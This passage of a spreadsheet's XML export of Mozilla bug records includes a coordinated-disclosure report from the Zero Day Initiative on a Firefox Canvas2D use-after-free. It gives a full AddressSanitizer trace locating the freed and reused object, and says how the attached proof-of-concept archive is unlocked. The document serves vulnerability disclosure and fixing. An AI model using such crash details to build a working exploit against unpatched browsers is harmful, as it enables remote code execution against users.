          <t>STR:
* https://treeherder.mozilla.org/#/jobs?repo=try&amp;selectedJob=291457375&amp;revision=6ca3590f5cad66526d026d415ef570ea51516809
* Shrink the bottom section (for example, let's make "Log parsing status" in the bottom left pane just barely visible)
* Try to see all of the values in the "Performance" tab. Can't because there's no way to scroll down.</t>
        </is>
      </c>
      <c r="X2302" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2303">
      <c r="A2303" t="n">
        <v>1175278</v>
      </c>
      <c r="B2303" t="inlineStr">
        <is>
          <t>2015-06-16 14:02:44 -0700</t>
        </is>
      </c>
      <c r="C2303" t="inlineStr">
        <is>
          <t>ZDI-CAN-2938: Mozilla Firefox nsIPresShell Use-After-Free Remote Code Execution Vulnerability</t>
        </is>
      </c>
      <c r="D2303" t="inlineStr">
        <is>
          <t>2016-07-02 11:40:29 -0700</t>
        </is>
      </c>
      <c r="E2303" t="n">
        <v>1</v>
      </c>
      <c r="F2303" t="n">
        <v>1</v>
      </c>
      <c r="G2303" t="n">
        <v>3</v>
      </c>
      <c r="H2303" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2303" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2303" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K2303" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L2303" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2303" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2303" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2303" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P2303" t="inlineStr">
        <is>
          <t>working on fix in bug 1164766. ZDI will disclose October 2015 (Firefox 41)</t>
        </is>
      </c>
      <c r="Q2303" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2303" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2303" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2303" t="n">
        <v>1</v>
      </c>
      <c r="U2303" t="n">
        <v>0</v>
      </c>
      <c r="V2303" t="n">
        <v>28</v>
      </c>
      <c r="W2303" t="inlineStr">
        <is>
          <t>Created attachment 8623278
Proof of Concept from ZDI
The following bug report was received from ZDI and Ucha Gobejishvili. 
ZDI-CAN-2938: Mozilla Firefox nsIPresShell Use-After-Free Remote Code Execution Vulnerability
-- CVSS -----------------------------------------
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
HP's Zero Day Initiative has identified a vulnerability affecting the following products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
```
Tested on: source build of mozilla-release (current 38.0.5)
Platform tested: ubuntu linux 14.04 LTS
This is a gdb session with address sanitizer output to demonstrate the use-after-free vulnerability.
=================================================================
==5279==ERROR: AddressSanitizer: heap-use-after-free on address 0x6170003e5c18 at pc 0x7fffe90defd9 bp 0x7fffffff6030 sp 0x7fffffff6028
READ of size 8 at 0x6170003e5c18 thread T0
    #0 0x7fffe90defd8 in nsIPresShell::StyleSet() const /home/researcher/source/firefox/objdir-ff-asan/dom/canvas/../../dist/include/nsIPresShell.h:319
    #1 0x7fffe90defd8 in mozilla::dom::GetFontStyleContext(mozilla::dom::Element*, nsAString_internal const&amp;, nsIPresShell*, nsAString_internal&amp;, mozilla::ErrorResult&amp;) /home/researcher/source/firefox/dom/canvas/CanvasRenderingContext2D.cpp:2174
    #2 0x7fffe90e9435 in mozilla::dom::CanvasRenderingContext2D::SetFont(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/researcher/source/firefox/dom/canvas/CanvasRenderingContext2D.cpp:2994
    #3 0x7fffe90edb6a in mozilla::dom::CanvasRenderingContext2D::GetCurrentFontStyle() /home/researcher/source/firefox/dom/canvas/CanvasRenderingContext2D.cpp:3808
    #4 0x7fffe871782d in mozilla::dom::CanvasRenderingContext2D::GetFont() /home/researcher/source/firefox/objdir-ff-asan/dom/bindings/../../dist/include/mozilla/dom/CanvasRenderingContext2D.h:737
    #5 0x7fffe871782d in mozilla::dom::CanvasRenderingContext2D::GetFont(nsAString_internal&amp;) /home/researcher/source/firefox/objdir-ff-asan/dom/bindings/../../dist/include/mozilla/dom/CanvasRenderingContext2D.h:340
    #6 0x7fffe86b35e9 in mozilla::dom::DOMString::operator nsString&amp;() /home/researcher/source/firefox/objdir-ff-asan/dom/bindings/../../dist/include/mozilla/dom/CanvasRenderingContext2D.h:443
    #7 0x7fffe86b35e9 in mozilla::dom::CanvasRenderingContext2DBinding::get_mozTextStyle(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::CanvasRenderingContext2D*, JSJitGetterCallArgs) /home/researcher/source/firefox/objdir-ff-asan/dom/bindings/./CanvasRenderingContext2DBinding.cpp:4924
    #8 0x7fffe90ac7a2 in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /home/researcher/source/firefox/dom/bindings/BindingUtils.cpp:2467
    #9 0x7fffed703d3e in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /home/researcher/source/firefox/js/src/jscntxtinlines.h:226
    #10 0x7fffed703d3e in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:498
    #11 0x7fffed6b8bd8 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:554
    #12 0x7fffed7af8df in js::InvokeGetterOrSetter(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:624
    #13 0x7fffed7af8df in CallGetter(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;js::Shape*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/vm/NativeObject.cpp:1626
    #14 0x7fffed7af8df in _ZL19GetExistingPropertyILN2js7AllowGCE1EEbP9JSContextNS0_11MaybeRootedIP8JSObjectXT_EE10HandleTypeENS4_IPNS0_12NativeObjectEXT_EE10HandleTypeENS4_IPNS0_5ShapeEXT_EE10HandleTypeENS4_IN2JS5ValueEXT_EE17MutableHandleTypeE /home/researcher/source/firefox/js/src/vm/NativeObject.cpp:1673
    #15 0x7fffed7b108a in _ZL23NativeGetPropertyInlineILN2js7AllowGCE1EEbP9JSContextNS0_11MaybeRootedIPNS0_12NativeObjectEXT_EE10HandleTypeENS4_IP8JSObjectXT_EE10HandleTypeENS4_I4jsidXT_EE10HandleTypeE12IsNameLookupNS4_IN2JS5ValueEXT_EE17MutableHandleTypeE /home/researcher/source/firefox/js/src/vm/NativeObject.cpp:1875:20
    #16 0x7fffed756ffd in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/vm/NativeObject.cpp:1909:12
    #17 0x7fffed756ffd in js::GetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/vm/NativeObject.h:1407
    #18 0x7fffed756ffd in GetPropertyOperation(JSContext*, js::InterpreterFrame*, JS::Handle&lt;JSScript*&gt;, unsigned char*, JS::MutableHandle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:256
    #19 0x7fffed756ffd in Interpret(JSContext*, js::RunState&amp;) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:2419
    #20 0x7fffed736f20 in js::RunScript(JSContext*, js::RunState&amp;) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:448
    #21 0x7fffed772e98 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:654
    #22 0x7fffed7738e7 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:690
    #23 0x7fffee75142c in Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/jsapi.cpp:4072
    #24 0x7fffee751e6a in Evaluate(JSContext*, JS::AutoObjectVector&amp;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/jsapi.cpp:4099
    #25 0x7fffee751e6a in JS::Evaluate(JSContext*, JS::AutoObjectVector&amp;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/jsapi.cpp:4154
    #26 0x7fffe798d1b6 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, nsJSUtils::EvaluateOptions const&amp;, JS::MutableHandle&lt;JS::Value&gt;, void**) /home/researcher/source/firefox/dom/base/nsJSUtils.cpp:265
    #27 0x7fffe798c6d6 in nsJSUtils::EvaluateString(JSContext*, nsAString_internal const&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, nsJSUtils::EvaluateOptions const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/dom/base/nsJSUtils.cpp:186
    #28 0x7fffe798e55e in nsJSUtils::EvaluateString(JSContext*, nsAString_internal const&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;) /home/researcher/source/firefox/dom/base/nsJSUtils.cpp:323
    #29 0x7fffe75af033 in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) /home/researcher/source/firefox/dom/base/nsGlobalWindow.cpp:12303
    #30 0x7fffe7590f1c in nsGlobalWindow::RunTimeout(nsTimeout*) /home/researcher/source/firefox/dom/base/nsGlobalWindow.cpp:12534
    #31 0x7fffe75ae21b in nsGlobalWindow::TimerCallback(nsITimer*, void*) /home/researcher/source/firefox/dom/base/nsGlobalWindow.cpp:12781
    #32 0x7fffe545348f in nsTimerImpl::Fire() /home/researcher/source/firefox/xpcom/threads/nsTimerImpl.cpp:631
    #33 0x7fffe5453f14 in nsTimerEvent::Run() /home/researcher/source/firefox/xpcom/threads/nsTimerImpl.cpp:724
    #34 0x7fffe54489e1 in nsThread::ProcessNextEvent(bool, bool*) /home/researcher/source/firefox/xpcom/threads/nsThread.cpp:855
    #35 0x7fffe54b8f80 in NS_ProcessNextEvent(nsIThread*, bool) /home/researcher/source/firefox/xpcom/glue/nsThreadUtils.cpp:265
    #36 0x7fffe5e160a9 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/researcher/source/firefox/ipc/glue/MessagePump.cpp:140
    #37 0x7fffe5d99476 in MessageLoop::RunInternal() /home/researcher/source/firefox/ipc/chromium/src/base/message_loop.cc:233
    #38 0x7fffe5d98f1b in MessageLoop::RunHandler() /home/researcher/source/firefox/ipc/chromium/src/base/message_loop.cc:226
    #39 0x7fffe5d98f1b in MessageLoop::Run() /home/researcher/source/firefox/ipc/chromium/src/base/message_loop.cc:200
    #40 0x7fffea597b1a in nsBaseAppShell::Run() /home/researcher/source/firefox/widget/nsBaseAppShell.cpp:164
    #41 0x7fffebf144e9 in nsAppStartup::Run() /home/researcher/source/firefox/toolkit/components/startup/nsAppStartup.cpp:281
    #42 0x7fffec0050ef in XREMain::XRE_mainRun() /home/researcher/source/firefox/toolkit/xre/nsAppRunner.cpp:4228
    #43 0x7fffec005e3a in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/researcher/source/firefox/toolkit/xre/nsAppRunner.cpp:4308
    #44 0x7fffec006ada in XRE_main /home/researcher/source/firefox/toolkit/xre/nsAppRunner.cpp:4527
    #45 0x47adab in do_main(int, char**, nsIFile*) /home/researcher/source/firefox/browser/app/nsBrowserApp.cpp:294
    #46 0x47adab in main /home/researcher/source/firefox/browser/app/nsBrowserApp.cpp:667
    #47 0x7ffff6bebec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #48 0x47a11a in _start (/home/researcher/source/firefox/objdir-ff-asan/dist/bin/firefox+0x47a11a)
0x6170003e5c18 is located 24 bytes inside of 696-byte region [0x6170003e5c00,0x6170003e5eb8)
freed by thread T0 here:
    #0 0x4607cf in __interceptor_free /home/researcher/source/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64
    #1 0x7fffead812bd in PresShell::Release() /home/researcher/source/firefox/layout/base/nsPresShell.cpp:807
    #2 0x7fffea9c6c15 in nsComputedDOMStyle::GetStyleContextForElement(mozilla::dom::Element*, nsIAtom*, nsIPresShell*, nsComputedDOMStyle::StyleType) /home/researcher/source/firefox/layout/style/nsComputedDOMStyle.cpp:413
    #3 0x7fffe90dea29 in mozilla::dom::GetFontParentStyleContext(mozilla::dom::Element*, nsIPresShell*, mozilla::ErrorResult&amp;) /home/researcher/source/firefox/dom/canvas/CanvasRenderingContext2D.cpp:2099
    #4 0x7fffe90dea29 in mozilla::dom::GetFontStyleContext(mozilla::dom::Element*, nsAString_internal const&amp;, nsIPresShell*, nsAString_internal&amp;, mozilla::ErrorResult&amp;) /home/researcher/source/firefox/dom/canvas/CanvasRenderingContext2D.cpp:2162
    #5 0x7fffe90e9435 in mozilla::dom::CanvasRenderingContext2D::SetFont(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/researcher/source/firefox/dom/canvas/CanvasRenderingContext2D.cpp:2994
    #6 0x7fffe90edb6a in mozilla::dom::CanvasRenderingContext2D::GetCurrentFontStyle() /home/researcher/source/firefox/dom/canvas/CanvasRenderingContext2D.cpp:3808
    #7 0x7fffe871782d in mozilla::dom::CanvasRenderingContext2D::GetFont() /home/researcher/source/firefox/objdir-ff-asan/dom/bindings/../../dist/include/mozilla/dom/CanvasRenderingContext2D.h:737
    #8 0x7fffe871782d in mozilla::dom::CanvasRenderingContext2D::GetFont(nsAString_internal&amp;) /home/researcher/source/firefox/objdir-ff-asan/dom/bindings/../../dist/include/mozilla/dom/CanvasRenderingContext2D.h:340
    #9 0x7fffe86b35e9 in mozilla::dom::DOMString::operator nsString&amp;() /home/researcher/source/firefox/objdir-ff-asan/dom/bindings/../../dist/include/mozilla/dom/CanvasRenderingContext2D.h:443
    #10 0x7fffe86b35e9 in mozilla::dom::CanvasRenderingContext2DBinding::get_mozTextStyle(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::CanvasRenderingContext2D*, JSJitGetterCallArgs) /home/researcher/source/firefox/objdir-ff-asan/dom/bindings/./CanvasRenderingContext2DBinding.cpp:4924
    #11 0x7fffe90ac7a2 in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /home/researcher/source/firefox/dom/bindings/BindingUtils.cpp:2467
    #12 0x7fffed703d3e in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /home/researcher/source/firefox/js/src/jscntxtinlines.h:226
    #13 0x7fffed703d3e in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:498
    #14 0x7fffed6b8bd8 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:554
    #15 0x7fffed7af8df in js::InvokeGetterOrSetter(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:624
    #16 0x7fffed7af8df in CallGetter(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;js::Shape*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/vm/NativeObject.cpp:1626
    #17 0x7fffed7af8df in _ZL19GetExistingPropertyILN2js7AllowGCE1EEbP9JSContextNS0_11MaybeRootedIP8JSObjectXT_EE10HandleTypeENS4_IPNS0_12NativeObjectEXT_EE10HandleTypeENS4_IPNS0_5ShapeEXT_EE10HandleTypeENS4_IN2JS5ValueEXT_EE17MutableHandleTypeE /home/researcher/source/firefox/js/src/vm/NativeObject.cpp:1673
    #18 0x7fffed7b108a in _ZL23NativeGetPropertyInlineILN2js7AllowGCE1EEbP9JSContextNS0_11MaybeRootedIPNS0_12NativeObjectEXT_EE10HandleTypeENS4_IP8JSObjectXT_EE10HandleTypeENS4_I4jsidXT_EE10HandleTypeE12IsNameLookupNS4_IN2JS5ValueEXT_EE17MutableHandleTypeE /home/researcher/source/firefox/js/src/vm/NativeObject.cpp:1875:20
    #19 0x7fffed756ffd in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/vm/NativeObject.cpp:1909:12
    #20 0x7fffed756ffd in js::GetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/vm/NativeObject.h:1407
    #21 0x7fffed756ffd in GetPropertyOperation(JSContext*, js::InterpreterFrame*, JS::Handle&lt;JSScript*&gt;, unsigned char*, JS::MutableHandle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:256
    #22 0x7fffed756ffd in Interpret(JSContext*, js::RunState&amp;) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:2419
    #23 0x7fffed736f20 in js::RunScript(JSContext*, js::RunState&amp;) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:448
    #24 0x7fffed772e98 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:654
    #25 0x7fffed7738e7 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /home/researcher/source/firefox/js/src/vm/Interpreter.cpp:690
    #26 0x7fffee75142c in Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/jsapi.cpp:4072
    #27 0x7fffee751e6a in Evaluate(JSContext*, JS::AutoObjectVector&amp;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/jsapi.cpp:4099
    #28 0x7fffee751e6a in JS::Evaluate(JSContext*, JS::AutoObjectVector&amp;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/js/src/jsapi.cpp:4154
    #29 0x7fffe798d1b6 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, nsJSUtils::EvaluateOptions const&amp;, JS::MutableHandle&lt;JS::Value&gt;, void**) /home/researcher/source/firefox/dom/base/nsJSUtils.cpp:265
    #30 0x7fffe798c6d6 in nsJSUtils::EvaluateString(JSContext*, nsAString_internal const&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, nsJSUtils::EvaluateOptions const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/researcher/source/firefox/dom/base/nsJSUtils.cpp:186
    #31 0x7fffe798e55e in nsJSUtils::EvaluateString(JSContext*, nsAString_internal const&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;) /home/researcher/source/firefox/dom/base/nsJSUtils.cpp:323
    #32 0x7fffe75af033 in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) /home/researcher/source/firefox/dom/base/nsGlobalWindow.cpp:12303
    #33 0x7fffe7590f1c in nsGlobalWindow::RunTimeout(nsTimeout*) /home/researcher/source/firefox/dom/base/nsGlobalWindow.cpp:12534
    #34 0x7fffe75ae21b in nsGlobalWindow::TimerCallback(nsITimer*, void*) /home/researcher/source/firefox/dom/base/nsGlobalWindow.cpp:12781
    #35 0x7fffe545348f in nsTimerImpl::Fire() /home/researcher/source/firefox/xpcom/threads/nsTimerImpl.cpp:631
    #36 0x7fffe5453f14 in nsTimerEvent::Run() /home/researcher/source/firefox/xpcom/threads/nsTimerImpl.cpp:724
    #37 0x7fffe54489e1 in nsThread::ProcessNextEvent(bool, bool*) /home/researcher/source/firefox/xpcom/threads/nsThread.cpp:855
    #38 0x7fffe54b8f80 in NS_ProcessNextEvent(nsIThread*, bool) /home/researcher/source/firefox/xpcom/glue/nsThreadUtils.cpp:265
    #39 0x7fffe5e160a9 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/researcher/source/firefox/ipc/glue/MessagePump.cpp:140
previously allocated by thread T0 here:
    #0 0x4609e7 in __interceptor_malloc /home/researcher/source/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x7ffff7f95852 in moz_xmalloc /home/researcher/source/firefox/memory/mozalloc/mozalloc.cpp:52
    #2 0x7fffe785118a in operator new(unsigned long) /home/researcher/source/firefox/objdir-ff-asan/dom/base/../../dist/include/mozilla/mozalloc.h:209
    #3 0x7fffe785118a in PresShell::operator new(unsigned long) /home/researcher/source/firefox/layout/base/nsPresShell.h:68
    #4 0x7fffe785118a in nsDocument::doCreateShell(nsPresContext*, nsViewManager*, nsStyleSet*, nsCompatibility) /home/researcher/source/firefox/dom/base/nsDocument.cpp:3880
    #5 0x7fffe96741e1 in nsHTMLDocument::CreateShell(nsPresContext*, nsViewManager*, nsStyleSet*) /home/researcher/source/firefox/dom/html/nsHTMLDocument.cpp:288
    #6 0x7fffeace2f53 in nsDocumentViewer::InitPresentationStuff(bool) /home/researcher/source/firefox/layout/base/nsDocumentViewer.cpp:643
    #7 0x7fffeace26d2 in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, nsIntRect const&amp;, bool, bool, bool) /home/researcher/source/firefox/layout/base/nsDocumentViewer.cpp:899
    #8 0x7fffeace168d in nsDocumentViewer::Init(nsIWidget*, nsIntRect const&amp;) /home/researcher/source/firefox/layout/base/nsDocumentViewer.cpp:625
    #9 0x7fffeb8cab8e in nsDocShell::SetupNewViewer(nsIContentViewer*) /home/researcher/source/firefox/docshell/base/nsDocShell.cpp:9261
    #10 0x7fffeb8c99af in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /home/researcher/source/firefox/docshell/base/nsDocShell.cpp:7168
    #11 0x7fffeb8759d0 in nsDocShell::CreateContentViewer(char const*, nsIRequest*, nsIStreamListener**) /home/researcher/source/firefox/docshell/base/nsDocShell.cpp:9069
    #12 0x7fffeb873002 in nsDSURIContentListener::DoContent(char const*, bool, nsIRequest*, nsIStreamListener**, bool*) /home/researcher/source/firefox/docshell/base/nsDSURIContentListener.cpp:141
    #13 0x7fffe6c8fb86 in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /home/researcher/source/firefox/uriloader/base/nsURILoader.cpp:726
    #14 0x7fffe6c8ce92 in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /home/researcher/source/firefox/uriloader/base/nsURILoader.cpp:401
    #15 0x7fffe6c8c129 in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) /home/researcher/source/firefox/uriloader/base/nsURILoader.cpp:262
    #16 0x7fffe55d0d6e in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) /home/researcher/source/firefox/netwerk/base/nsBaseChannel.cpp:754
    #17 0x7fffe56014bc in nsInputStreamPump::OnStateStart() /home/researcher/source/firefox/netwerk/base/nsInputStreamPump.cpp:531
    #18 0x7fffe5600a5b in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /home/researcher/source/firefox/netwerk/base/nsInputStreamPump.cpp:433
    #19 0x7fffe54085fb in nsInputStreamReadyEvent::Run() /home/researcher/source/firefox/xpcom/io/nsStreamUtils.cpp:90
    #20 0x7fffe54489e1 in nsThread::ProcessNextEvent(bool, bool*) /home/researcher/source/firefox/xpcom/threads/nsThread.cpp:855
    #21 0x7fffe54b8f80 in NS_ProcessNextEvent(nsIThread*, bool) /home/researcher/source/firefox/xpcom/glue/nsThreadUtils.cpp:265
    #22 0x7fffe5e160ca in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/researcher/source/firefox/ipc/glue/MessagePump.cpp:99
    #23 0x7fffe5d99476 in MessageLoop::RunInternal() /home/researcher/source/firefox/ipc/chromium/src/base/message_loop.cc:233
    #24 0x7fffe5d98f1b in MessageLoop::RunHandler() /home/researcher/source/firefox/ipc/chromium/src/base/message_loop.cc:226
    #25 0x7fffe5d98f1b in MessageLoop::Run() /home/researcher/source/firefox/ipc/chromium/src/base/message_loop.cc:200
    #26 0x7fffea597b1a in nsBaseAppShell::Run() /home/researcher/source/firefox/widget/nsBaseAppShell.cpp:164
    #27 0x7fffebf144e9 in nsAppStartup::Run() /home/researcher/source/firefox/toolkit/components/startup/nsAppStartup.cpp:281
    #28 0x7fffec0050ef in XREMain::XRE_mainRun() /home/researcher/source/firefox/toolkit/xre/nsAppRunner.cpp:4228
    #29 0x7fffec005e3a in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/researcher/source/firefox/toolkit/xre/nsAppRunner.cpp:4308
    #30 0x7fffec006ada in XRE_main /home/researcher/source/firefox/toolkit/xre/nsAppRunner.cpp:4527
    #31 0x47adab in do_main(int, char**, nsIFile*) /home/researcher/source/firefox/browser/app/nsBrowserApp.cpp:294
    #32 0x47adab in main /home/researcher/source/firefox/browser/app/nsBrowserApp.cpp:667
    #33 0x7ffff6bebec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
SUMMARY: AddressSanitizer: heap-use-after-free /home/researcher/source/firefox/objdir-ff-asan/dom/canvas/../../dist/include/nsIPresShell.h:319 nsIPresShell::StyleSet() const
Shadow bytes around the buggy address:
  0x0c2e80074b30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80074b40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80074b50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80074b60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80074b70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c2e80074b80: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80074b90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80074ba0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80074bb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80074bc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80074bd0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzon==5279==ABORTING
```
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   Ucha Gobejishvili working with HP's Zero Day Initiative
-- FURTHER DETAILS ------------------------------
If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.
Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up the the deadline please coordinate with us so that we may release our advisory detailing the issue. If the 120 day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:
Zero Day Initiative
zdi-disclosures@hp.com
The PGP key used for all ZDI vendor communications is available from:
     http://www.zerodayinitiative.com/documents/zdi-pgp-key.asc
-- INFORMATION ABOUT THE ZDI ---------------------
Established by TippingPoint and acquired by Hewlett-Packard, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
The ZDI is unique in how the acquired vulnerability information is used. The ZDI does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its HP TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.
    http://www.zerodayinitiative.com
-- DISCLOSURE POLICY ----------------------------
Our vulnerability disclosure policy is available online at:
